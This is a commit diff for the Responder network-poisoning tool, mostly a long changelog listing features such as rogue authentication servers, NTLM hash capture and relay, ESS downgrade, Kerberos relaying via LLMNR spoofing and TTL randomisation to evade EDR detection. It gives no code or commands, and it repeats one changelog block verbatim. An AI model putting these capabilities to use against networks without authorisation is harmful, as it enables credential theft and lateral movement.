Implemented RDNSS and DNSSL

Long overdue README update

.github/FUNDING.yml

@@ -0,0 +1,2 @@
+github: lgandx
+custom: 'https://paypal.me/PythonResponder'

.gitignore

@@ -1,5 +1,15 @@
+# Python artifacts
+*.pyc
+.venv/
+
 # Responder logs
 *.db
 *.txt
 *.log
-logs/*
+
+# Generated certificates and keys
+certs/*.crt
+certs/*.key
+
+# IDE
+.idea/

CHANGELOG.md

@@ -0,0 +1,713 @@
+
+n.n.n / 2025-05-22
+==================
+
+  * added check for aioquic & updated version to reflect recent changes
+  * Merge pull request #310 from ctjf/master
+  * Merge pull request #308 from BlWasp/error_code_returned
+  * Merge pull request #311 from stfnw/master
+  * DHCP poisoner: refactor FindIP
+  * added quic support based on xpn's work
+  * Indentation typos
+  * Add status code control
+  * Merge pull request #305 from L1-0/patch-1
+  * Update RPC.py
+  * Merge pull request #301 from q-roland/kerberos_relaying_llmnr
+  * Adding answer name spoofing capabilities when poisoning LLMNR for Kerberos relaying purpose
+
+n.n.n / 2025-05-22
+==================
+
+  * added check for aioquic & updated version to reflect recent changes
+  * Merge pull request #310 from ctjf/master
+  * Merge pull request #308 from BlWasp/error_code_returned
+  * Merge pull request #311 from stfnw/master
+  * DHCP poisoner: refactor FindIP
+  * added quic support based on xpn's work
+  * Indentation typos
+  * Add status code control
+  * Merge pull request #305 from L1-0/patch-1
+  * Update RPC.py
+  * Merge pull request #301 from q-roland/kerberos_relaying_llmnr
+  * Adding answer name spoofing capabilities when poisoning LLMNR for Kerberos relaying purpose
+# Changelog
+
+All notable changes to this project will be documented in this file.
+
+The format is based on [Keep a Changelog](http://keepachangelog.com/en/1.0.0/)
+and this project adheres to [Semantic Versioning](http://semver.org/spec/v2.0.0.html).
+
+<!-- insertion marker -->
+## Unreleased
+
+<small>[Compare with latest](https://github.com/lgandx/Responder/compare/v3.1.4.0...HEAD)</small>
+
+### Added
+
+- Add options for poisoners ([807bd57](https://github.com/lgandx/Responder/commit/807bd57a96337ab77f2fff50729a6eb229e5dc37) by f3rn0s).
+- Add randomness in TTL value to avoid some EDR detections ([f50f0be](https://github.com/lgandx/Responder/commit/f50f0be59c0de6fd0ff8eef62ba31db96815c878) by nodauf).
+- added support for either resolv.conf or resolvectl ([1a2f2fd](https://github.com/lgandx/Responder/commit/1a2f2fdb22a2bf8b04e0ac99219831457b7ba43a) by lgandx).
+
+### Fixed
+
+- Fixed issue with smb signing detection ([413bc8b](https://github.com/lgandx/Responder/commit/413bc8be3169d215f7d5f251a78c8d8404e52f61) by lgandx).
+- fixed minor bug ([e51f24e](https://github.com/lgandx/Responder/commit/e51f24e36c1f84bc995a690d385c506c35cc6175) by lgandx).
+- Fixed bug when IPv6 is disabled via GRUB. ([fa297c8](https://github.com/lgandx/Responder/commit/fa297c8a16f605bdb731542c67280a4d8bc023c4) by lgandx).
+
+### Removed
+
+- removed debug string ([4b560f6](https://github.com/lgandx/Responder/commit/4b560f6e17493dcfc6bf653d0ebe0547a88735ac) by lgandx).
+- removed bowser listener ([e564e51](https://github.com/lgandx/Responder/commit/e564e5159b9a1bfe3c5f1101b3ab11672e0fd46b) by lgandx).
+
+<!-- insertion marker -->
+## [v3.1.4.0](https://github.com/lgandx/Responder/releases/tag/v3.1.4.0) - 2024-01-04
+
+<small>[Compare with v3.1.3.0](https://github.com/lgandx/Responder/compare/v3.1.3.0...v3.1.4.0)</small>
+
+### Added
+
+- added LDAPS listener ([6d61f04](https://github.com/lgandx/Responder/commit/6d61f0439c1779767c9ea9840ac433ed98e672cd) by exploide).
+- added:error handling on exceptions. ([f670fba](https://github.com/lgandx/Responder/commit/f670fbaa7fcd3b072aef7cf29f43c1d76d6f13bf) by lgandx).
+- Added full path to gen-self-sign-cert.sh ([69f431e](https://github.com/lgandx/Responder/commit/69f431e58f07c231e75a73b0782855e9277573ac) by kevintellier).
+- add flag (-s) to enable smbv1scan ([cf0c4ee](https://github.com/lgandx/Responder/commit/cf0c4ee659779c027374155716f09b13cb41abb5) by requin).
+- add hostname on smbv2 scan result ([709df2c](https://github.com/lgandx/Responder/commit/709df2c6e18ec2fa6647fdaaa4d9f9e2cb7920f8) by requin).
+- Added dump by legacy protocols ([b8818ed](https://github.com/lgandx/Responder/commit/b8818ed0c47d9d615c4ba1dcff99e8d2d98296d5) by lgandx).
+- added requirements.txt ([00d9d27](https://github.com/lgandx/Responder/commit/00d9d27089d8f02658b08f596d28d1722c276d57) by lgandx).
+- Added: append .local TLD to DontRespondToNames + MDNS bug fix ([0bc226b](https://github.com/lgandx/Responder/commit/0bc226b4beaa84eb3ac26f5d563959ccf567262b) by lgandx).
+- Added Quiet mode ([2cd66a9](https://github.com/lgandx/Responder/commit/2cd66a9b92aa6ca2b7fba0fea03b0a285c186683) by jb).
+
+### Fixed
+
+- Fixed issue in http srv, more hashes & signature reduction. ([66ee7f8](https://github.com/lgandx/Responder/commit/66ee7f8f08f57926f5b3694ffb9e87619eee576f) by lgandx).
+- fixed a TypeError in MSSQLBrowser ([20cdd9c](https://github.com/lgandx/Responder/commit/20cdd9c7c23e620e3d530f76003b94407882e9cd) by exploide).
+- fixed 'SyntaxWarning: invalid escape sequence' for Python 3.12+ ([e9bd8a4](https://github.com/lgandx/Responder/commit/e9bd8a43ef353a03ba9195236a3aa5faf3788faa) by exploide).
+- fixed minor bug on py 3.10 ([31393c7](https://github.com/lgandx/Responder/commit/31393c70726206fc1056f76ef6b81a981d7954c5) by lgandx).
+- fixed HTTP basic auth parsing when password contains colons ([dc33d1f](https://github.com/lgandx/Responder/commit/dc33d1f858e9bbc58ae8edf030dbfee208d748f1) by exploide).
+- Fixing soft failure which results in missed SMTP credential interception ([34603ae](https://github.com/lgandx/Responder/commit/34603aed0aadfe3c3625ea729cbc9dc0f06e7e73) by Syntricks).
+- Fixing collections import issue for /tools/MultiRelay/odict.py ([aa8d818](https://github.com/lgandx/Responder/commit/aa8d81861bcdfc3dbf253b617ec044fd4807e9d4) by Shutdown).
+- Fixing import issue like in /tools/odict.py ([2c4cadb](https://github.com/lgandx/Responder/commit/2c4cadbf7dec6e26ec2494a0cfde38655f5bebaf) by Shutdown).
+- fix typo of ServerTlype ([0c80b76](https://github.com/lgandx/Responder/commit/0c80b76f5758dfae86bf4924a49b29c31e2e77f8) by deltronzero).
+- Fixed potential disruption on Proxy-Auth ([c51251d](https://github.com/lgandx/Responder/commit/c51251db5ff311743238b1675d52edb7c6849f00) by lgandx).
+- fixed the RespondTo/DontRespondTo issue ([2765ef4](https://github.com/lgandx/Responder/commit/2765ef4e668bc3493924aae5032e3ec63078ac42) by lgandx).
+
+### Removed
+
+- removed patreon donation link. ([700b7d6](https://github.com/lgandx/Responder/commit/700b7d6222afe3c1d6fb17a0a522e1166e6ad025) by lgandx).
+- removed useless string ([08e44d7](https://github.com/lgandx/Responder/commit/08e44d72acd563910c153749b3c204ce0304bdd1) by lgandx).
+- removed debug ([4ea3d7b](https://github.com/lgandx/Responder/commit/4ea3d7b76554dee5160aaf76a0235074590284f8) by lgandx).
+- Removed Patreon link ([8e12d2b](https://github.com/lgandx/Responder/commit/8e12d2bcfe11cc23e35ea678b9e4979856183d0e) by lgandx).
+- Removed machine accounts dump, since they are not crackable ([c9b5dd0](https://github.com/lgandx/Responder/commit/c9b5dd040e27de95638b33da7a35e5187efb4aac) by lgandx).
+
+## [v3.1.3.0](https://github.com/lgandx/Responder/releases/tag/v3.1.3.0) - 2022-07-26
+
+<small>[Compare with v3.1.2.0](https://github.com/lgandx/Responder/compare/v3.1.2.0...v3.1.3.0)</small>
+
+### Fixed
+
+- Fixed: Warnings on python 3.10 ([9b1c99c](https://github.com/lgandx/Responder/commit/9b1c99ccd29890496b0194c061266997e28be4c0) by lgandx).
+- Fix missing paren error ([0c7a3ff](https://github.com/lgandx/Responder/commit/0c7a3ffabeee77cb9f3d960168a357e9583b2f9f) by cweedon).
+- Fix double logging of first hash or cleartext ([e7eb3bc](https://github.com/lgandx/Responder/commit/e7eb3bcce85c5d437082214c0e8044919cccee56) by Gustaf Blomqvist).
+
+### Removed
+
+- removed -r reference from help msg. ([983a1c6](https://github.com/lgandx/Responder/commit/983a1c6576cb7dfe6cabea93e56dc4f2c557621b) by lgandx).
+- removed -r references ([03fa9a7](https://github.com/lgandx/Responder/commit/03fa9a7187c80586629c58a297d0d78f2f8da559) by lgandx).
+
+## [v3.1.2.0](https://github.com/lgandx/Responder/releases/tag/v3.1.2.0) - 2022-02-12
+
+<small>[Compare with v3.1.1.0](https://github.com/lgandx/Responder/compare/v3.1.1.0...v3.1.2.0)</small>
+
+### Added
+
+- added support for OPT EDNS ([5cf6922](https://github.com/lgandx/Responder/commit/5cf69228cf5ce4c0433904ee1d05955e8fd6f618) by lgandx).
+
+### Fixed
+
+- Fixed options formating in README ([f85ad77](https://github.com/lgandx/Responder/commit/f85ad77d595f5d79b86ddce843bc884f1ff4ac9e) by Andrii Nechytailov).
+
+## [v3.1.1.0](https://github.com/lgandx/Responder/releases/tag/v3.1.1.0) - 2021-12-17
+
+<small>[Compare with v3.0.9.0](https://github.com/lgandx/Responder/compare/v3.0.9.0...v3.1.1.0)</small>
+
+### Added
+
+- Added IPv6 support ([5d4510c](https://github.com/lgandx/Responder/commit/5d4510cc1d0479b13ece9d58ea60d187daf8cdab) by lgandx).
+- added: dhcp inform ([3e8c9fd](https://github.com/lgandx/Responder/commit/3e8c9fdb0eceb3eb1f7c6dbc81502b340a5ca152) by lgandx).
+- Added DHCP DNS vs DHCP WPAD ([76f6c88](https://github.com/lgandx/Responder/commit/76f6c88df31bbd59dc6dceba1b59251012e45f81) by lgandx).
+- Added DHCP DNS vs WPAD srv injection ([9dc7798](https://github.com/lgandx/Responder/commit/9dc779869b5a47fdf26cf79a727ea4a853f0d129) by lgandx).
+- Added date and time for each Responder session config log. ([bb17595](https://github.com/lgandx/Responder/commit/bb17595e3fc9fafa58c8979bebc395ed872ef598) by lgandx).
+
+### Removed
+
+- removed fingerprint.py ([0b56d6a](https://github.com/lgandx/Responder/commit/0b56d6aaeb00406b364cf152b258365393d64ccc) by lgandx).
+
+## [v3.0.9.0](https://github.com/lgandx/Responder/releases/tag/v3.0.9.0) - 2021-12-10
+
+<small>[Compare with v3.0.8.0](https://github.com/lgandx/Responder/compare/v3.0.8.0...v3.0.9.0)</small>
+
+### Added
+
+- added the ability to provide external IP on WPAD poison via DHCP ([ba885b9](https://github.com/lgandx/Responder/commit/ba885b9345024809555d1a2c1f8cc463870602bb) by lgandx).
+- Added a check for MSSQL ([5680487](https://github.com/lgandx/Responder/commit/568048710f0cf5c04c53fd8e026fdd1b3f5c16e6) by lgandx).
+
+### Fixed
+
+- Fixed the ON/OFF for poisoners when in Analyze mode. ([3cd5140](https://github.com/lgandx/Responder/commit/3cd5140c800d8f4e9e8547e4137cafe33fc2f066) by lgandx).
+
+### Removed
+
+- Remove analyze mode on DNS since you need to ARP to get queries ([17e62bd](https://github.com/lgandx/Responder/commit/17e62bda1aed4884c1f08e514faba8c1e39b36ad) by lgandx).
+
+## [v3.0.8.0](https://github.com/lgandx/Responder/releases/tag/v3.0.8.0) - 2021-12-03
+
+<small>[Compare with v3.0.7.0](https://github.com/lgandx/Responder/compare/v3.0.7.0...v3.0.8.0)</small>
+
+### Added
+
+- Added DB for RunFinger results & Report ([f90b76f](https://github.com/lgandx/Responder/commit/f90b76fed202ee4a6e17a030151c8de4430717a8) by lgandx).
+- added timeout option for fine tuning ([a462d1d](https://github.com/lgandx/Responder/commit/a462d1df061b214eebcabdbe3f95caa5dd8ea3c7) by lgandx).
+- added DHCP db & updated the report script to reflect that ([1dfa997](https://github.com/lgandx/Responder/commit/1dfa997da8c0fa1e51a1be30b2a3d5f5d92f4b7f) by lgandx).
+- Added support for single IP or range file. ([02fb3f8](https://github.com/lgandx/Responder/commit/02fb3f8978286a486d633a707889ea8992a7f43a) by lgandx).
+
+### Fixed
+
+- fix: DHCP now working on VPN interface ([88a2c6a](https://github.com/lgandx/Responder/commit/88a2c6a53b721da995fbbd8e5cd82fb40d4af268) by lgandx).
+- Fixed a bug and increased speed. ([1b2a22f](https://github.com/lgandx/Responder/commit/1b2a22facfd54820cc5f8ebba06f5cd996e917dc) by lgandx).
+
+### Removed
+
+- Removed old DHCP script since its now a Responder module. ([d425783](https://github.com/lgandx/Responder/commit/d425783be994b0d2518633e4b93e13e305685e5b) by lgandx).
+- removed default certs ([de778f6](https://github.com/lgandx/Responder/commit/de778f66982817f1149408bc2e080371d3d4a71d) by lgandx).
+- Removed the static certs and added automatic cert generation ([21afd35](https://github.com/lgandx/Responder/commit/21afd357f828b586cfa96992c8c978024285b162) by lgandx).
+- removed debug str ([826b5af](https://github.com/lgandx/Responder/commit/826b5af9e2e37d50afdd3eb3ee66121e6c81c2a2) by lgandx).
+
+## [v3.0.7.0](https://github.com/lgandx/Responder/releases/tag/v3.0.7.0) - 2021-10-26
+
+<small>[Compare with v3.0.6.0](https://github.com/lgandx/Responder/compare/v3.0.6.0...v3.0.7.0)</small>
+
+### Added
+
+- Added DHCP server ([c449b6b](https://github.com/lgandx/Responder/commit/c449b6bcb990959e352967b3842b09978b9b2729) by lgandx).
+- Add --lm switch for ESS downgrade ([dcb80d9](https://github.com/lgandx/Responder/commit/dcb80d992e385a0f0fdd3f724a0b040a42439306) by Pixis).
+- Add ESS disabling information ([51f8ab4](https://github.com/lgandx/Responder/commit/51f8ab43682973df32534ca97c99fb1318a0c77d) by Pixis).
+- Add ESS downgrade parameter ([baf80aa](https://github.com/lgandx/Responder/commit/baf80aa4f0e1aaf9ee81ffe6b0b5089d39f42516) by pixis).
+
+### Fixed
+
+- fixed minor isse ([350058c](https://github.com/lgandx/Responder/commit/350058c1795e43c23950b6bd23c33f45795ec7cc) by lgandx).
+
+## [v3.0.6.0](https://github.com/lgandx/Responder/releases/tag/v3.0.6.0) - 2021-04-19
+
+<small>[Compare with v3.0.5.0](https://github.com/lgandx/Responder/compare/v3.0.5.0...v3.0.6.0)</small>
+
+### Added
+
+- Added WinRM rogue server ([8531544](https://github.com/lgandx/Responder/commit/85315442bd010dd61fcb62de8d6ca9cc969426ba) by lgandx).
+
+## [v3.0.5.0](https://github.com/lgandx/Responder/releases/tag/v3.0.5.0) - 2021-04-17
+
+<small>[Compare with v3.0.4.0](https://github.com/lgandx/Responder/compare/v3.0.4.0...v3.0.5.0)</small>
+
+### Added
+
+- Added dce-rpc module + enhancements + bug fix. ([e91e37c](https://github.com/lgandx/Responder/commit/e91e37c9749f58330e0d68ce062a48b100a2d09e) by lgandx).
+
+### Removed
+
+- removed addiontional RR on SRV answers ([027e6b9](https://github.com/lgandx/Responder/commit/027e6b95c3ca89367cb5123758c2fc29aba27a59) by lgandx).
+
+## [v3.0.4.0](https://github.com/lgandx/Responder/releases/tag/v3.0.4.0) - 2021-04-12
+
+<small>[Compare with v3.0.3.0](https://github.com/lgandx/Responder/compare/v3.0.3.0...v3.0.4.0)</small>
+
+### Added
+
+- Added DNS SRV handling for ldap/kerberos + LDAP netlogon ping ([1271b8e](https://github.com/lgandx/Responder/commit/1271b8e17983bd3969d951ce2b4c9b75600f94b9) by lgandx).
+- added a check for exec file ([cc3a5b5](https://github.com/lgandx/Responder/commit/cc3a5b5cfffbb8e7430030aa66a2981feae7fe85) by lgandx).
+- Added donation banner. ([8104139](https://github.com/lgandx/Responder/commit/8104139a3535a49caf7ec0ed64e8e33ea686494f) by lgandx).
+- added donation address and minor typo ([06f9f91](https://github.com/lgandx/Responder/commit/06f9f91f118b0729a74d3c1810a493886655e6f1) by lgandx).
+- added smb filetime support ([b0f044f](https://github.com/lgandx/Responder/commit/b0f044fe4e710597ae73e6f1af87ea246b0cd365) by lgandx).
+
+### Removed
+
+- removed FindSMB2UPTime.py since RunFinger already get this info ([6c51080](https://github.com/lgandx/Responder/commit/6c51080109fd8c9305021336c0dc8c72e01b5541) by lgandx).
+- Removed MultiRelay binaries ([35b12b4](https://github.com/lgandx/Responder/commit/35b12b48323b1960960aba916334635d5a590875) by lgandx).
+- Removed BindShell executable file ([5d762c4](https://github.com/lgandx/Responder/commit/5d762c4a550f2c578f4d7874f24563240276852d) by lgandx).
+- Removed donation banner ([ccee87a](https://github.com/lgandx/Responder/commit/ccee87aa95f2ec16827592ba9d98c4895cec0cb9) by lgandx).
+- removed verification ([dd1a674](https://github.com/lgandx/Responder/commit/dd1a67408081c94490a3263c46b2eb0b6107e542) by lgandx).
+
+## [v3.0.3.0](https://github.com/lgandx/Responder/releases/tag/v3.0.3.0) - 2021-02-08
+
+<small>[Compare with v3.0.2.0](https://github.com/lgandx/Responder/compare/v3.0.2.0...v3.0.3.0)</small>
+
+### Added
+
+- Added support for SMB2 signing ([24e7b7c](https://github.com/lgandx/Responder/commit/24e7b7c667c3c9feb1cd3a25b16bd8d9c2df5ec6) by lgandx).
+- Added SMB2 support for RunFinger and various other checks. ([e24792d](https://github.com/lgandx/Responder/commit/e24792d7743dbf3a5c5ffac92113e36e5d682e42) by lgandx).
+
+### Fixed
+
+- Fix wrong syntax ([fb10d20](https://github.com/lgandx/Responder/commit/fb10d20ea387448ad084a57f5f4441c908fc53cc) by Khiem Doan).
+- fix custom challenge in python3 ([7b47c8f](https://github.com/lgandx/Responder/commit/7b47c8fe4edcb53b035465985d92500b96fb1a84) by ThePirateWhoSmellsOfSunflowers).
+- Fix typos in README ([12b796a](https://github.com/lgandx/Responder/commit/12b796a292b87be15ef8eec31cb276c447b9e8c8) by Laban Sköllermark).
+
+## [v3.0.2.0](https://github.com/lgandx/Responder/releases/tag/v3.0.2.0) - 2020-09-28
+
+<small>[Compare with v3.0.1.0](https://github.com/lgandx/Responder/compare/v3.0.1.0...v3.0.2.0)</small>
+
+### Fixed
+
+- Fixed LLMNR/NBT-NS/Browser issue when binding to a specific interface ([af7d27a](https://github.com/lgandx/Responder/commit/af7d27ac8cb3c2b0664a8b0a11940c0f3c25c891) by lgandx).
+
+## [v3.0.1.0](https://github.com/lgandx/Responder/releases/tag/v3.0.1.0) - 2020-08-19
+
+<small>[Compare with v3.0.0.0](https://github.com/lgandx/Responder/compare/v3.0.0.0...v3.0.1.0)</small>
+
+### Added
+
+- Added DNSUpdate.py, a small script to add DNS record to DC for gatering from different VLANs ([05617de](https://github.com/lgandx/Responder/commit/05617defefcd6954915d0b42d73d4ccfcccad2d4) by Sagar-Jangam).
+
+### Fixed
+
+- Fix encoding issue in Python 3 ([7420f62](https://github.com/lgandx/Responder/commit/7420f620825d5a5ae6dc68364a5680910f7f0512) by Sophie Brun).
+
+## [v3.0.0.0](https://github.com/lgandx/Responder/releases/tag/v3.0.0.0) - 2020-01-09
+
+<small>[Compare with v2.3.4.0](https://github.com/lgandx/Responder/compare/v2.3.4.0...v3.0.0.0)</small>
+
+### Added
+
+- Added py3 and py2 compatibility + many bugfix ([b510b2b](https://github.com/lgandx/Responder/commit/b510b2bb2523a3fe24953ac685e697914a60b26c) by lgandx).
+
+## [v2.3.4.0](https://github.com/lgandx/Responder/releases/tag/v2.3.4.0) - 2019-08-17
+
+<small>[Compare with v2.3.3.9](https://github.com/lgandx/Responder/compare/v2.3.3.9...v2.3.4.0)</small>
+
+### Added
+
+- Added RDP rogue server ([c52843a](https://github.com/lgandx/Responder/commit/c52843a5359a143c5a94a74c095d6ac4679cd4b1) by lgandx).
+- Added proper changes to RunFinger (and is not checking for MS17-010 straight away) ([105502e](https://github.com/lgandx/Responder/commit/105502edd401615604e09a9a71a268252c82523d) by Paul A).
+
+### Fixed
+
+- Fix socket timeout on HTTP POST requests ([e7a787c](https://github.com/lgandx/Responder/commit/e7a787cbc4e01e92be6e062e94211dca644fae0c) by Crypt0-M3lon).
+- fixed minor bugfix on recent merge ([38e721d](https://github.com/lgandx/Responder/commit/38e721da9826b95ed3599151559e8f8c535e4d6e) by lgandx).
+- Fix multi HTTP responses ([defabfa](https://github.com/lgandx/Responder/commit/defabfa543f0b567d7e981003c7a00d7f02c3a16) by Clément Notin).
+- Fix version number in settings.py ([621c5a3](https://github.com/lgandx/Responder/commit/621c5a3c125646c14db19fc48f30e4075102c929) by Clément Notin).
+- Fixed some small typos in MS17-010 output ([daaf6f7](https://github.com/lgandx/Responder/commit/daaf6f7296ee754fe37b2382d0e459f7b6e74dcc) by Chris Maddalena).
+
+### Removed
+
+- removed debug string ([47e63ae](https://github.com/lgandx/Responder/commit/47e63ae4ec3266a35845d0bf116cf17fa0d17fd7) by lgandx).
+
+## [v2.3.3.9](https://github.com/lgandx/Responder/releases/tag/v2.3.3.9) - 2017-11-20
+
+<small>[Compare with v2.3.3.8](https://github.com/lgandx/Responder/compare/v2.3.3.8...v2.3.3.9)</small>
+
+### Added
+
+- Added: check for null sessions and MS17-010 ([b37f562](https://github.com/lgandx/Responder/commit/b37f56264a6b57faff81c12a8143662bf1ddb91d) by lgandx).
+- Add ignore case on check body for html inject ([47c3115](https://github.com/lgandx/Responder/commit/47c311553eb38327622d5e6b25e20a662c31c30d) by Lionel PRAT).
+- added support for plain auth ([207b0d4](https://github.com/lgandx/Responder/commit/207b0d455c95a5cd68fbfbbc022e5cc3cb41878f) by lgandx).
+
+## [v2.3.3.8](https://github.com/lgandx/Responder/releases/tag/v2.3.3.8) - 2017-09-05
+
+<small>[Compare with v2.3.3.7](https://github.com/lgandx/Responder/compare/v2.3.3.7...v2.3.3.8)</small>
+
+### Changed
+
+- Changed the complete LDAP parsing hash algo (ntlmv2 bug). ([679cf65](https://github.com/lgandx/Responder/commit/679cf65cff0c537b594d284cd01e2ea9c690d4ae) by lgandx).
+
+## [v2.3.3.7](https://github.com/lgandx/Responder/releases/tag/v2.3.3.7) - 2017-09-05
+
+<small>[Compare with v2.3.3.6](https://github.com/lgandx/Responder/compare/v2.3.3.6...v2.3.3.7)</small>
+
+### Added
+
+- Add in check for uptime since March 14th 2017, which could indicate the system is vulnerable to MS17-010 ([5859c31](https://github.com/lgandx/Responder/commit/5859c31e8ecf35c5b12ac653e8ab793bc9270604) by Matt Kelly).
+- Add Microsoft SQL Server Browser responder ([bff935e](https://github.com/lgandx/Responder/commit/bff935e71ea401a4477004022623b1617ac090b3) by Matthew Daley).
+- added: mimi32 cmd,  MultiRelay random RPC & Namedpipe & latest mimikatz ([38219e2](https://github.com/lgandx/Responder/commit/38219e249e700c1b20317e0b96f4a120fdfafb98) by lgandx).
+
+### Fixed
+
+- Fixed various bugs and improved the LDAP module. ([be26b50](https://github.com/lgandx/Responder/commit/be26b504b5133c78158d9794cd361ce1a7418775) by lgandx).
+- Fixed space typo in FindSMB2UPTime.py ([11c0096](https://github.com/lgandx/Responder/commit/11c00969c36b2ed51763ee6c975870b05e84cdcb) by myst404).
+- Fixed instances of "CRTL-C" to "CTRL-C" ([44a4e49](https://github.com/lgandx/Responder/commit/44a4e495ccb21098c6b882feb25e636510fc72b9) by Randy Ramos).
+
+## [v2.3.3.6](https://github.com/lgandx/Responder/releases/tag/v2.3.3.6) - 2017-03-29
+
+<small>[Compare with v2.3.3.5](https://github.com/lgandx/Responder/compare/v2.3.3.5...v2.3.3.6)</small>
+
+### Fixed
+
+- Fixed bug in FindSMB2UPTime ([6f3cc45](https://github.com/lgandx/Responder/commit/6f3cc4564c9cf34b75ef5469fd54edd4b3004b54) by lgandx).
+
+### Removed
+
+- Removed Paypal donation link. ([b05bdca](https://github.com/lgandx/Responder/commit/b05bdcab9600ad4e7ef8b70e2d8ee1b03b8b442a) by lgandx).
+
+## [v2.3.3.5](https://github.com/lgandx/Responder/releases/tag/v2.3.3.5) - 2017-02-18
+
+<small>[Compare with v2.3.3.4](https://github.com/lgandx/Responder/compare/v2.3.3.4...v2.3.3.5)</small>
+
+## [v2.3.3.4](https://github.com/lgandx/Responder/releases/tag/v2.3.3.4) - 2017-02-18
+
+<small>[Compare with v2.3.3.3](https://github.com/lgandx/Responder/compare/v2.3.3.3...v2.3.3.4)</small>
+
+### Added
+
+- Added: Hashdump, Stats report ([21d48be](https://github.com/lgandx/Responder/commit/21d48be98fd30a9fd0747588cbbb070ed0ce100b) by lgandx).
+- added `ip` commands in addition to ifconfig and netstat ([db61f24](https://github.com/lgandx/Responder/commit/db61f243c9cc3c9821703c78e780e745703c0bb3) by thejosko).
+
+### Fixed
+
+- fixed crash: typo. ([0642999](https://github.com/lgandx/Responder/commit/0642999741b02de79266c730cc262bb3345644f9) by lgandx).
+- Fix for RandomChallenge function. Function getrandbits can return less than 64 bits, thus decode('hex') will crash with TypeError: Odd-length string ([de6e869](https://github.com/lgandx/Responder/commit/de6e869a7981d49725e791303bd16c4159d70880) by Gifts).
+- Fix Proxy_Auth. Random challenge broke it. ([5a2ee18](https://github.com/lgandx/Responder/commit/5a2ee18bfaa66ff245747cf8afc114a9a894507c) by Timon Hackenjos).
+
+## [v2.3.3.3](https://github.com/lgandx/Responder/releases/tag/v2.3.3.3) - 2017-01-03
+
+<small>[Compare with v2.3.3.2](https://github.com/lgandx/Responder/compare/v2.3.3.2...v2.3.3.3)</small>
+
+### Added
+
+- Added: Random challenge for each requests (default) ([0d441d1](https://github.com/lgandx/Responder/commit/0d441d1899053fde6792288fc83be0c883df19f0) by lgandx).
+
+## [v2.3.3.2](https://github.com/lgandx/Responder/releases/tag/v2.3.3.2) - 2017-01-03
+
+<small>[Compare with v2.3.3.1](https://github.com/lgandx/Responder/compare/v2.3.3.1...v2.3.3.2)</small>
+
+### Added
+
+- Added: Random challenge for each requests (default) ([1d38cd3](https://github.com/lgandx/Responder/commit/1d38cd39af9154f5a9e898428de25fe0afa68d2f) by lgandx).
+- Added paypal button ([17dc81c](https://github.com/lgandx/Responder/commit/17dc81cb6833a91300d0669398974f0ed9bc006e) by lgandx).
+- Added: Scripting support. -c and -d command line switch ([ab2d890](https://github.com/lgandx/Responder/commit/ab2d8907f033384e593a38073e50604a834f4bf3) by lgandx).
+- Added: BTC donation address ([730808c](https://github.com/lgandx/Responder/commit/730808c83c0c7f67370ceeff977b0e727eb28ea4) by lgandx).
+
+### Removed
+
+- Removed ThreadingMixIn. MultiRelay should process one request at the timeand queue the next ones. ([4a7499d](https://github.com/lgandx/Responder/commit/4a7499df039269094c718eb9e19760e79eea86f7) by lgandx).
+
+## [v2.3.3.1](https://github.com/lgandx/Responder/releases/tag/v2.3.3.1) - 2016-10-18
+
+<small>[Compare with v2.3.3.0](https://github.com/lgandx/Responder/compare/v2.3.3.0...v2.3.3.1)</small>
+
+### Added
+
+- Added: Logs dumped files for multiple targets ([d560105](https://github.com/lgandx/Responder/commit/d5601056b386a7ae3ca167f0562cbe87bf004c38) by lgandx).
+
+### Fixed
+
+- Fixed wrong challenge issue ([027f841](https://github.com/lgandx/Responder/commit/027f841cdf11fd0ad129825dcc70d6ac8b5d3983) by lgandx).
+
+## [v2.3.3.0](https://github.com/lgandx/Responder/releases/tag/v2.3.3.0) - 2016-10-12
+
+<small>[Compare with v2.3.2.8](https://github.com/lgandx/Responder/compare/v2.3.2.8...v2.3.3.0)</small>
+
+### Added
+
+- Added: Compability for Multi-Relay ([5b06173](https://github.com/lgandx/Responder/commit/5b0617361ede8df67caad4ca89723ad18a67fa53) by lgandx).
+
+### Fixed
+
+- Fix values for win98 and win10 (requested here: https://github.com/lgandx/Responder/pull/7/commits/d9d34f04cddbd666865089d809eb5b3d46dd9cd4) ([60c91c6](https://github.com/lgandx/Responder/commit/60c91c662607c3991cb760c7dd221e81cfb69518) by lgandx).
+- Fixed the bind to interface issue (https://github.com/lgandx/Responder/issues/6) ([ce211f7](https://github.com/lgandx/Responder/commit/ce211f7fcfa7ea9e3431161fec5075ca63730070) by lgandx).
+- fixed bug in hash parsing. ([0cf1087](https://github.com/lgandx/Responder/commit/0cf1087010088ef1c3fecc7d2ad851c7c49d0639) by lgandx).
+
+### Changed
+
+- Changed to executable ([3e46ecd](https://github.com/lgandx/Responder/commit/3e46ecd27e53c58c3dc38888a2db1d3340a5a3ab) by lgandx).
+
+## [v2.3.2.8](https://github.com/lgandx/Responder/releases/tag/v2.3.2.8) - 2016-10-06
+
+<small>[Compare with v2.3.2.7](https://github.com/lgandx/Responder/compare/v2.3.2.7...v2.3.2.8)</small>
+
+### Added
+
+- Added: Now delete services on the fly. ([c6e401c](https://github.com/lgandx/Responder/commit/c6e401c2290fbb6c68bbc396915ea3fa7b11b5f0) by lgandx).
+
+## [v2.3.2.7](https://github.com/lgandx/Responder/releases/tag/v2.3.2.7) - 2016-10-05
+
+<small>[Compare with v2.3.2.6](https://github.com/lgandx/Responder/compare/v2.3.2.6...v2.3.2.7)</small>
+
+### Added
+
+- Added: Possibility to target all users. use 'ALL' with -u ([d81ef9c](https://github.com/lgandx/Responder/commit/d81ef9c33ab710f973c68f60cd0b7960f9e4841b) by lgandx).
+
+### Fixed
+
+- Fixed minor bug ([7054c60](https://github.com/lgandx/Responder/commit/7054c60f38cafc7e1c4d8a6ce39e12afbfc8b482) by lgandx).
+
+## [v2.3.2.6](https://github.com/lgandx/Responder/releases/tag/v2.3.2.6) - 2016-10-05
+
+<small>[Compare with v2.3.2.5](https://github.com/lgandx/Responder/compare/v2.3.2.5...v2.3.2.6)</small>
+
+## [v2.3.2.5](https://github.com/lgandx/Responder/releases/tag/v2.3.2.5) - 2016-10-03
+
+<small>[Compare with v2.3.2.4](https://github.com/lgandx/Responder/compare/v2.3.2.4...v2.3.2.5)</small>
+
+### Added
+
+- Added logs folder. ([cd09e19](https://github.com/lgandx/Responder/commit/cd09e19a9363867a75d7db1dea4830969bc0d68e) by lgandx).
+- Added: Cross-protocol NTLMv1-2 relay (beta). ([ab67070](https://github.com/lgandx/Responder/commit/ab67070a2b82e94f2abb506a69f8fa8c0dc09852) by lgandx).
+
+### Removed
+
